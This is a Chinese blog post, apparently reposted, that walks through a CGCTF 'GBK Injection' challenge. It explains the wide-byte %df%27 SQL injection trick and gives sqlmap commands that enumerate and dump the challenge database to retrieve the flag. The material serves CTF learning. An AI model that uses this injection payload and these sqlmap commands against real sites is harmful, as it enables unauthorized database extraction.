首页 博客列表 精选博客 智能问答 chat-GPT 关于我
CGCTF——GBK Injection
发布日期:2021-06-30 17:41:06 浏览次数:2 分类:技术文章

本文共 434 字,大约阅读时间需要 1 分钟。

在这里插入图片描述

该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路。
(%df%27是双字节不转义单引号实现注入的方法)
原理参考:
参考2:

利用sqlmap工具注入:

1.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --current-db
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --tables -D sae-chinalover

在这里插入图片描述

有6个表,一个一个爆,经尝试,ctf4有flag:
3.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --dump -T ctf4 -D sae-chinalover

在这里插入图片描述

PS:
遇到gpk编写的数据库就可用双字节注入

转载地址:https://leo-max.blog.csdn.net/article/details/104249401 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:攻防世界(高手进阶区)——NewsCenter
下一篇:CGCTF——MYSQL

发表评论

最新留言

哈哈,博客排版真的漂亮呢~
[***.90.31.176]2024年04月28日 14时27分05秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

单目深度估计 monodepth2模型 代码 2019-04-30
搜索中的TSA(树搜索算法) & GSA(图搜索算法) & UCS(代价一致) & CSP(约束满足问题) 2019-04-30
位图索引Bitmap indexes 2019-04-30
YOLO算法(二)—— Yolov2 & yolo9000 2019-04-30
YOLO算法(三)—— Yolov3 & Yolo系列网络优缺点 2019-04-30
Python的__future__模块 2019-04-30
Paper reading —— Semantic Stereo Matching with Pyramid Cost Volumes(SSPCV-Net) 2019-04-30
计算机视觉中的cost-volume的概念具体指什么(代价体积) 2019-04-30
Paper reading——Pyramid Stereo Matching Network(PSM-Net) 2019-04-30
启发函数heuristic 与 A* 2019-04-30
Image Pyramid(图像金字塔) 2019-04-30
Oracle 作业记录 2019-04-30
putty连接AWS配置(multimedia project) 2019-04-30
Hourglass Network 沙漏网络 (pose estimation姿态估计) 2019-04-30
OpenCV实战(二)——答题卡识别判卷 2019-04-30
目标检测神经网络的发展历程(52 个目标检测模型) 2019-04-30
Boundary loss 损失函数 2019-04-30
神经网络调参实战(一)—— 训练更多次数 & tensorboard & finetune 2019-04-30
tensorflow使用tensorboard进行可视化 2019-04-30
神经网络调参实战(二)—— activation & initializer & optimizer 2019-04-30
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 310791564 位访客
访问时间: 2024-05-04 20:12:41 访问IP: 13.58.82.79     Copyright © 2020 - 2023 blog.css8.cn 京ICP备2021015314号-1 手机版